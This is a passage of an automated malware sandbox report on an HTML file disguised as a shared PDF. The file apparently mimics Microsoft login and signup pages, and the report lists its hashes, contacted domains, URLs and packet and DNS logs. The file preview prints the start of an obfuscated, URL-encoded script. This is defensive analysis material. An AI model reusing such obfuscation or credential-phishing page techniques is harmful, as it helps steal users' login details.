
Entropy (8bit): 0.5107383661010148

Encrypted: false

MD5: 39AE1993014236A99CAD2273F08A3EAD

SHA1: 383843D92894994437E2DC3C649362789ABECD40

SHA-256: C3B3D7EB81E964FE30501939991C97C3BE6D8A40A868184B9DC773CD696A7809

SHA-512: 6C6E2294C5FB35700837D5314D6BB7FAF6762B7469533688B4DA7E71CB49F0264C6D5D225A0C468D28E87A61CCD267A25730BD29C6B496A899DB377C1CC8CA9B

Malicious: false

Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFE2722E89930C0447.TMPProcess: C:\Program Files\internet explorer\iexplore.exe

File Type: data

Size (bytes): 25441

Copyright Joe Security LLC 2019 Page 35 of 47

Entropy (8bit): 0.41825796848948976

Encrypted: false

MD5: 2CE578A5C18E3868F4B05FFD3AC32B45

SHA1: 87D3562F718DA2D2D9E6A663D4D5315F79C7FFB1

SHA-256: 184A717F67A8AB38A2C2F5F2177280A40F92B8FFE1F5F78F190DCD2976EE25E4

SHA-512: FB0CAFB4560422FAEED61552C3F4FDD235CCCE371C149F30B42DF834205F273F4B039D0273E74A76D1A0CEE5B944322F9B5CAF86F6091B53AC85253F922B9A1D

Malicious: false

Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFE2722E89930C0447.TMP

Name IP Active Malicious Antivirus Detection Reputation

aa-hip-prod.southcentralus.cloudapp.azure.com 104.215.74.84 true false high

cs1227.wpc.alphacdn.net 192.229.221.185 true false high

statics-uhf-wus.akamaized.net unknown unknown false high

signup.live.com unknown unknown false high

secure.aadcdn.microsoftonline-p.com unknown unknown false high

code.jquery.com unknown unknown false high

login.microsoftonline.com unknown unknown false high

aadcdn.msauth.net unknown unknown false high

assets.onestore.ms unknown unknown false high

img-prod-cms-rt-microsoft-com.akamaized.net unknown unknown false high

acctcdn.msauth.net unknown unknown false high

ajax.aspnetcdn.com unknown unknown false high

Name Source Malicious Antivirus Detection Reputation

https://aka.ms/redeemrewards servicesagreement[1].htm.2.dr false high

https://login.skype.com/login privacystatement[1].htm.2.dr false high

https://www.skype.com/go/ustax servicesagreement[1].htm.2.dr false high

https://www.visiblemeasures.com/viewer-settings-opt-out privacystatement[1].htm.2.dr false high

jquery.org/license jquerypackage_1.10_5V7LAuc3bNAQx2QQfr1RPw2[1].js.2.dr

false high

https://acctcdn.msauth.net signup[1].htm.2.dr false high

sizzlejs.com/ jquerypackage_1.10_5V7LAuc3bNAQx2QQfr1RPw2[1].js.2.dr

false high

https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico~(

imagestore.dat.2.dr false high

https://www.adr.org servicesagreement[1].htm.2.dr false high

https://login.microsof/Desktop/CUsersadminisratorDocumentspagesselfSENDERSharedfile07092019_pdf.html

{6B3F30D6-A233-11E9-AADA-C25F135D3C65}.dat.1.dr

false Avira URL Cloud: safe unknown

www.amazon.com/ msapplication.xml.1.dr false high

www.asp.net/ajaxlibrary/CDN.ashx. privacystatement[1].htm.2.dr false high

https://signup.live.com/error.aspx?errcode=1045&mkt=en-US

signup[1].htm.2.dr false high

https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_bxeixgi3llnj-nuc4-xqwa2

reprocess[1].htm.2.dr false high

https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/ux.converged.error.core.min_2y6puv-fhesw6oymb-

reprocess[1].htm.2.dr false Avira URL Cloud: safe unknown

aka.ms/kr4ndl privacystatement[1].htm.2.dr false high

https://www.xbox.com/en-US/Legal/CodeOfConduct servicesagreement[1].htm.2.dr false high

opensource.org/licenses/mit-license.php) knockout_3.3.0_RcZl9zWsSPzSceyfD4X8cA2[1].js.2.dr

false high

www.twitter.com/ msapplication.xml5.1.dr false high

www.json.org/json2.js knockout_3.3.0_RcZl9zWsSPzSceyfD4X8cA2[1].js.2.dr

false high

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Copyright Joe Security LLC 2019 Page 36 of 47

https://acctcdn.msauth.net/convergedsignuptemplatespackage_Z7Bw5rYduRaj_L3dZZgy6A2.js?v=1

signup[1].htm.2.dr false high

https://aadcdn.msauth.net/ests/2.1/ reprocess[1].htm.2.dr false high

www.xbox.com/ privacystatement[1].htm.2.dr false high

https://aka.ms/taxservice servicesagreement[1].htm.2.dr false high

https://watchbeam.zendesk.com/hc/en-us/articles/115000922623-Rules-of-User-Conduct

privacystatement[1].htm.2.dr false high

https://www.privacyshield.gov/welcome privacystatement[1].htm.2.dr false high

https://acctcdn.msauth.net/images/convergedbg_small_v2_Z9GCPpM7FVE8hxRSZUez6g2.jpg)

signup[1].htm.2.dr false high

https://ondemand.webtrends.com/support/optout.asp privacystatement[1].htm.2.dr false high

https://skype.com/go/myaccount servicesagreement[1].htm.2.dr false high

https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico~

imagestore.dat.2.dr false high

https://www.skype.com servicesagreement[1].htm.2.dr false high

https://www.appsflyer.com/optout privacystatement[1].htm.2.dr false high

https://www.privacyshield.gov/ privacystatement[1].htm.2.dr false high

https://privacy.micros {6B3F30D6-A233-11E9-AADA-C25F135D3C65}.dat.1.dr

false high

getbootstrap.com) knockout_3.3.0_RcZl9zWsSPzSceyfD4X8cA2[1].js.2.dr

false high

https://acctcdn.msauth.net/lwsignupheaderjs_4NYTMbxtFAmu44aIr74B-Q2.js?v=1

signup[1].htm.2.dr false high

https://acctcdn.msauth.net/lightweightsignuppackage_wZ8EUx6qAhhR2oShS4Wetg2.js?v=1

signup[1].htm.2.dr false high

https://aim.yahoo.com/aim/us/en/optout/ privacystatement[1].htm.2.dr false high

www.mpegla.com servicesagreement[1].htm.2.dr false high

github.com/requirejs/almond/LICENSE 18-d72213[1].js.2.dr false high

www.clicktale.net/disable.html privacystatement[1].htm.2.dr false high

www.reddit.com/ msapplication.xml4.1.dr false high

https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/ux.converged.error.strings-en.min_xqvbwocyraoe

reprocess[1].htm.2.dr false Avira URL Cloud: safe unknown

https://mixer.com/contact servicesagreement[1].htm.2.dr false high

https://www.here.com/) privacystatement[1].htm.2.dr false high

https://www.skype.com/go/store.reactivate.credit servicesagreement[1].htm.2.dr false high

https://www.adjust.com/opt-out/ privacystatement[1].htm.2.dr false high

www.nytimes.com/ msapplication.xml3.1.dr false high

https://acctcdn.msauth.net/images/convergedbg_v2_pdvUOT_2pyXH5ith335y8A2.jpg)

signup[1].htm.2.dr false high

https://kissmetrics.com/user-privacy privacystatement[1].htm.2.dr false high

https://acctcdn.msauth.net/images/microsoft_logo_7lyNn7YkjJOP0NwZNw6QvQ2.svg

signup[1].htm.2.dr false high

https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico

imagestore.dat.2.dr false high

https://acctcdn.msauth.net/images/favicon.ico?v=2~ imagestore.dat.2.dr false high

fontello.com icons[1].eot.2.dr false high

https://signup.live.co {6B3F30D6-A233-11E9-AADA-C25F135D3C65}.dat.1.dr

false high

https://acctcdn.msauth.net/jquerypackage_1.10_5V7LAuc3bNAQx2QQfr1RPw2.js?v=1

signup[1].htm.2.dr false high

knockoutjs.com/ ux.converged.error.core.min_2y6puv-fhesw6oymb-3hdq2[1].js.2.dr, knockout_3.3.0_RcZl9zWsSPzSceyfD4X8cA2[1].js.2.dr

false high

https://ec.europa.eu/info/law/law-topic/data-protection/data-transfers-outside-eu/adequacy-protectio

privacystatement[1].htm.2.dr false high

https://github.com/douglascrockford/JSON-js signup[1].htm.2.dr, ux.converged.error.core.min_2y6puv-fhesw6oymb-3hdq2[1].js.2.dr

false high

https://acctcdn.msauth.net/images/favicon.ico?v=2~( imagestore.dat.2.dr false high

www.nielsen-online.com/corp.jsp?section=leg_prs&nav=1#Optoutchoices

privacystatement[1].htm.2.dr false high

Name Source Malicious Antivirus Detection Reputation

Copyright Joe Security LLC 2019 Page 37 of 47

https://acctcdn.msauth.net/knockout_3.3.0_RcZl9zWsSPzSceyfD4X8cA2.js?v=1

signup[1].htm.2.dr false high

https://www.skype.com/go/allrates servicesagreement[1].htm.2.dr false high

https://acctcdn.msauth.net/lwsignupstringscountrybirthdate_en-us_pfPjf9tCnoZxLPMa20Xx0A2.js?v=1

signup[1].htm.2.dr false high

www.opensource.org/licenses/mit-license.php) ux.converged.error.core.min_2y6puv-fhesw6oymb-3hdq2[1].js.2.dr, knockout_3.3.0_RcZl9zWsSPzSceyfD4X8cA2[1].js.2.dr

false high

fontello.comiconsRegulariconsiconsVersion icons[1].eot.2.dr false high

www.criteo.com/ privacystatement[1].htm.2.dr false high

www.macromedia.com/support/documentation/en/flashplayer/help/settings_manager.html

privacystatement[1].htm.2.dr false high

https://login.microsof {6B3F30D6-A233-11E9-AADA-C25F135D3C65}.dat.1.dr

false high

www.youtube.com/ msapplication.xml7.1.dr false high

https://www.skype.com/go/legal servicesagreement[1].htm.2.dr false high

www.networkadvertising.org/ privacystatement[1].htm.2.dr false high

https://mixer.com/about/tos servicesagreement[1].htm.2.dr false high

https://www.microsoft. {6B3F30D6-A233-11E9-AADA-C25F135D3C65}.dat.1.dr

false high

https://github.com/twbs/bootstrap/blob/master/LICENSE) knockout_3.3.0_RcZl9zWsSPzSceyfD4X8cA2[1].js.2.dr

false high

www.wikipedia.com/ msapplication.xml6.1.dr false high

https://acctcdn.msauth.net/images/favicon.ico?v=2 imagestore.dat.2.dr false high

https://www.skype.com/legal/broadcast servicesagreement[1].htm.2.dr false high

www.a9.com/ privacystatement[1].htm.2.dr false high

www.live.com/ msapplication.xml2.1.dr false high

https://github.com/h5bp/html5-boilerplate/blob/master/src/css/main.css

app[1].css.2.dr false high

https://www.linkedin.com/legal/privacy-policy privacystatement[1].htm.2.dr false high

https://login.microsoftonline.com/common/reprocess?ctx=rqiiaxwro2_tuacfc_mwlscowgdswary4nfiia4hcz2e2

~DF2952A600E710646A.TMP.1.dr false high

www.appnexus.com/ privacystatement[1].htm.2.dr false high

https://acctcdn.msauth.net/converged_ux_v2_pfEhDrELLHNcznXIOy__sQ2.css?v=1

signup[1].htm.2.dr false high

jquery.com/ jquerypackage_1.10_5V7LAuc3bNAQx2QQfr1RPw2[1].js.2.dr

false high

https://www.xbox.com/Legal/ThirdPartyDataSharing privacystatement[1].htm.2.dr false high

Name Source Malicious Antivirus Detection Reputation

Contacted IPs

Copyright Joe Security LLC 2019 Page 38 of 47

Static File Info

GeneralFile type: HTML document, ASCII text, with very long lines, with

CRLF line terminators

Entropy (8bit): 3.117783318185634

TrID: Java Script embedded in Visual Basic Script (4500/0) 100.00%

File name: CUsersadminisratorDocumentspagesselfSENDERSharedfile07092019_pdf.html2.html

File size: 566395

MD5: 0a3a65e4479f61e0d5618894d11c2e47

SHA1: 6e51ebe4fbcc3a4941fbb0e179f710470ac0da7f

SHA256: fb470475c8c24b97f8dbe7df23a312ad84de5feea065a99b1fd317bca80e4c7b

SHA512: 9fa49e82dddb99e261e15ef078e903a5db4c0d8d51f06dcd7ba59b594d365641e0cd957d8555ba6ff5fdc783616c5bc4837da0cc964685d6ce6015a33e26bd4b

SSDEEP: 768:5aAZeagr0A1SAvLEvS2S37WRQAElji3yX2AksAYmAVA3FSA3jfAkD+AkU/AkNEAu:m3jJwfZ0

File Content Preview: <script type="text/javascript">.. ..document.write(unescape('%3c%73%63%72%69%70%74%20%6c%61%6e%67%75%61%67%65%3d%6a%61%76%61%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%75%6e%65%73%63%61%70%65%28%27%25%33%43%25%32%31%44%4f%43%54%5

File Icon

Icon Hash: f8c89c9a9a998cb8

No. of IPs < 25%

25% < No. of IPs < 50%

50% < No. of IPs < 75%

75% < No. of IPs

IP Country Flag ASN ASN Name Malicious

192.229.221.185 United States 15133 unknown false

104.215.74.84 United States 8075 unknown false

Public

Copyright Joe Security LLC 2019 Page 39 of 47

Network Behavior

Timestamp Source Port Dest Port Source IP Dest IP

Jul 9, 2019 03:22:37.604620934 CEST 49725 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.604711056 CEST 49726 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.604902983 CEST 49727 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.605007887 CEST 49728 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.605221987 CEST 49729 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.605460882 CEST 49730 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.621936083 CEST 443 49725 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.622029066 CEST 49725 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.622088909 CEST 443 49726 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.622112036 CEST 443 49727 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.622132063 CEST 443 49728 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.622227907 CEST 49726 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.622272968 CEST 443 49729 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.622273922 CEST 49727 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.622293949 CEST 49728 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.622451067 CEST 49729 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.622554064 CEST 443 49730 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.622725010 CEST 49730 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.623944998 CEST 49725 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.624990940 CEST 49727 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.625138044 CEST 49729 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.625617981 CEST 49728 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.628238916 CEST 49730 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.628369093 CEST 49726 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.641062021 CEST 443 49725 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.642126083 CEST 443 49725 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.642177105 CEST 443 49725 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.642220020 CEST 443 49725 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.642251968 CEST 443 49725 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.642271042 CEST 443 49725 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.642288923 CEST 443 49727 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.642308950 CEST 443 49729 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.642452955 CEST 49725 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.642946005 CEST 443 49728 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.642995119 CEST 443 49727 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.643050909 CEST 443 49727 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.643151999 CEST 49727 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.643182993 CEST 443 49727 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.643217087 CEST 443 49727 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.643321991 CEST 49727 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.643357992 CEST 443 49729 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.643433094 CEST 443 49729 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.643450975 CEST 49729 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.643498898 CEST 443 49729 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.643553019 CEST 443 49729 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.643606901 CEST 49729 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.643672943 CEST 443 49729 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.643716097 CEST 443 49728 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.643753052 CEST 443 49728 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.643779039 CEST 49729 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.643798113 CEST 49728 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.643831968 CEST 443 49728 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.643855095 CEST 443 49728 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.643874884 CEST 443 49728 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.644002914 CEST 49728 443 192.168.2.5 192.229.221.185

TCP Packets

Copyright Joe Security LLC 2019 Page 40 of 47

Jul 9, 2019 03:22:37.645184040 CEST 443 49730 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.645358086 CEST 443 49726 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.646274090 CEST 443 49730 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.646306992 CEST 443 49730 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.646389961 CEST 443 49730 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.646456957 CEST 443 49730 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.646471024 CEST 49730 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.646497011 CEST 443 49730 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.646528006 CEST 443 49726 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.646563053 CEST 443 49726 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.646593094 CEST 443 49726 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.646611929 CEST 443 49726 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.646630049 CEST 443 49726 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.646693945 CEST 49730 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.646713972 CEST 49726 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.660800934 CEST 49727 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.663371086 CEST 49727 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.664352894 CEST 49727 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.664704084 CEST 49727 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.665040016 CEST 49727 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.666110992 CEST 49727 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.666243076 CEST 49727 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.666363001 CEST 49727 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.666477919 CEST 49727 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.666599989 CEST 49727 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.675599098 CEST 49729 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.676090002 CEST 49729 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.677460909 CEST 49730 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.678528070 CEST 49730 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.679276943 CEST 49726 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.679908991 CEST 443 49727 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.680039883 CEST 49727 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.680138111 CEST 443 49727 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.680264950 CEST 443 49727 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.680337906 CEST 49727 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.681052923 CEST 49725 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.681222916 CEST 49726 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.681548119 CEST 49727 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.681583881 CEST 443 49727 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.681865931 CEST 49728 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.682305098 CEST 443 49727 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.683160067 CEST 49725 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.683197021 CEST 443 49727 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.683248043 CEST 443 49727 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.683276892 CEST 443 49727 192.229.221.185 192.168.2.5

Timestamp Source Port Dest Port Source IP Dest IP

Timestamp Source Port Dest Port Source IP Dest IP

Jul 9, 2019 03:22:15.306005955 CEST 60811 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:22:15.344815016 CEST 53 60811 8.8.8.8 192.168.2.5

Jul 9, 2019 03:22:18.036662102 CEST 57659 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:22:18.072875023 CEST 53 57659 8.8.8.8 192.168.2.5

Jul 9, 2019 03:22:18.101578951 CEST 54527 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:22:18.120796919 CEST 53 54527 8.8.8.8 192.168.2.5

Jul 9, 2019 03:22:33.459271908 CEST 60440 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:22:33.498903036 CEST 53 60440 8.8.8.8 192.168.2.5

Jul 9, 2019 03:22:34.615241051 CEST 62740 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:22:34.648251057 CEST 53 62740 8.8.8.8 192.168.2.5

Jul 9, 2019 03:22:34.807482958 CEST 62238 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:22:34.837987900 CEST 53 62238 8.8.8.8 192.168.2.5

Jul 9, 2019 03:22:36.174796104 CEST 65013 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:22:36.197906971 CEST 53 65013 8.8.8.8 192.168.2.5

Jul 9, 2019 03:22:36.586719036 CEST 55972 53 192.168.2.5 8.8.8.8

UDP Packets

Copyright Joe Security LLC 2019 Page 41 of 47

Jul 9, 2019 03:22:36.628884077 CEST 53 55972 8.8.8.8 192.168.2.5

Jul 9, 2019 03:22:37.413742065 CEST 51695 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:22:37.475236893 CEST 53 51695 8.8.8.8 192.168.2.5

Jul 9, 2019 03:22:37.620021105 CEST 60558 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:22:37.657002926 CEST 53 60558 8.8.8.8 192.168.2.5

Jul 9, 2019 03:22:39.055264950 CEST 63487 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:22:39.078263044 CEST 53 63487 8.8.8.8 192.168.2.5

Jul 9, 2019 03:22:39.146162987 CEST 54294 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:22:39.191160917 CEST 53 54294 8.8.8.8 192.168.2.5

Jul 9, 2019 03:22:40.320421934 CEST 65179 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:22:40.327626944 CEST 65315 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:22:40.335621119 CEST 49772 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:22:40.351214886 CEST 50135 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:22:40.362567902 CEST 53 65179 8.8.8.8 192.168.2.5

Jul 9, 2019 03:22:40.366381884 CEST 53 49772 8.8.8.8 192.168.2.5

Jul 9, 2019 03:22:40.372360945 CEST 53 65315 8.8.8.8 192.168.2.5

Jul 9, 2019 03:22:40.390448093 CEST 53 50135 8.8.8.8 192.168.2.5

Jul 9, 2019 03:22:43.518302917 CEST 65205 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:22:43.541495085 CEST 53 65205 8.8.8.8 192.168.2.5

Jul 9, 2019 03:22:44.350034952 CEST 64570 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:22:44.407598972 CEST 53 64570 8.8.8.8 192.168.2.5

Jul 9, 2019 03:22:44.782726049 CEST 62955 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:22:44.814117908 CEST 53 62955 8.8.8.8 192.168.2.5

Jul 9, 2019 03:22:45.325735092 CEST 59147 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:22:45.339833975 CEST 53 59147 8.8.8.8 192.168.2.5

Jul 9, 2019 03:22:45.847078085 CEST 61222 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:22:45.879093885 CEST 53 61222 8.8.8.8 192.168.2.5

Jul 9, 2019 03:22:46.334467888 CEST 59147 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:22:46.348403931 CEST 53 59147 8.8.8.8 192.168.2.5

Jul 9, 2019 03:22:46.857953072 CEST 61222 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:22:46.871692896 CEST 53 61222 8.8.8.8 192.168.2.5

Jul 9, 2019 03:22:47.344588041 CEST 59147 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:22:47.359529972 CEST 53 59147 8.8.8.8 192.168.2.5

Jul 9, 2019 03:22:47.860244989 CEST 61222 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:22:47.891139984 CEST 53 61222 8.8.8.8 192.168.2.5

Jul 9, 2019 03:22:49.359091997 CEST 59147 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:22:49.381702900 CEST 53 59147 8.8.8.8 192.168.2.5

Jul 9, 2019 03:22:49.857733965 CEST 61222 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:22:49.871602058 CEST 53 61222 8.8.8.8 192.168.2.5

Jul 9, 2019 03:22:53.363944054 CEST 59147 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:22:53.377852917 CEST 53 59147 8.8.8.8 192.168.2.5

Jul 9, 2019 03:22:53.869606018 CEST 61222 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:22:53.883584023 CEST 53 61222 8.8.8.8 192.168.2.5

Jul 9, 2019 03:23:04.888499975 CEST 56934 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:23:05.052109957 CEST 53 56934 8.8.8.8 192.168.2.5

Jul 9, 2019 03:23:05.881908894 CEST 56934 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:23:06.888025999 CEST 56934 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:23:06.933669090 CEST 53 56934 8.8.8.8 192.168.2.5

Jul 9, 2019 03:23:06.949147940 CEST 53 56934 8.8.8.8 192.168.2.5

Jul 9, 2019 03:23:08.899605989 CEST 56934 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:23:08.927752018 CEST 53 56934 8.8.8.8 192.168.2.5

Jul 9, 2019 03:23:12.906055927 CEST 56934 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:23:12.934633970 CEST 53 56934 8.8.8.8 192.168.2.5

Jul 9, 2019 03:24:16.948779106 CEST 55625 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:24:16.967993021 CEST 53 55625 8.8.8.8 192.168.2.5

Jul 9, 2019 03:24:17.961113930 CEST 55625 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:24:17.987577915 CEST 53 55625 8.8.8.8 192.168.2.5

Jul 9, 2019 03:24:18.964833975 CEST 55625 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:24:18.991202116 CEST 53 55625 8.8.8.8 192.168.2.5

Jul 9, 2019 03:24:20.979218006 CEST 55625 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:24:20.998610020 CEST 53 55625 8.8.8.8 192.168.2.5

Jul 9, 2019 03:24:24.992845058 CEST 55625 53 192.168.2.5 8.8.8.8

Jul 9, 2019 03:24:25.019279957 CEST 53 55625 8.8.8.8 192.168.2.5

Timestamp Source Port Dest Port Source IP Dest IP

Copyright Joe Security LLC 2019 Page 42 of 47

Timestamp Source IP Dest IP Trans ID OP Code Name Type Class

Jul 9, 2019 03:22:18.036662102 CEST 192.168.2.5 8.8.8.8 0x647f Standard query (0)

secure.aadcdn.microsoftonline-p.com

A (IP address) IN (0x0001)

Jul 9, 2019 03:22:18.101578951 CEST 192.168.2.5 8.8.8.8 0xc682 Standard query (0)

code.jquery.com A (IP address) IN (0x0001)

Jul 9, 2019 03:22:33.459271908 CEST 192.168.2.5 8.8.8.8 0xf793 Standard query (0)

secure.aadcdn.microsoftonline-p.com

A (IP address) IN (0x0001)

Jul 9, 2019 03:22:34.615241051 CEST 192.168.2.5 8.8.8.8 0x96be Standard query (0)

login.microsoftonline.com

A (IP address) IN (0x0001)

Jul 9, 2019 03:22:34.807482958 CEST 192.168.2.5 8.8.8.8 0x4f22 Standard query (0)

aadcdn.msauth.net

A (IP address) IN (0x0001)

Jul 9, 2019 03:22:36.586719036 CEST 192.168.2.5 8.8.8.8 0x19d5 Standard query (0)

signup.live.com A (IP address) IN (0x0001)

Jul 9, 2019 03:22:37.413742065 CEST 192.168.2.5 8.8.8.8 0x9b8 Standard query (0)

acctcdn.msauth.net

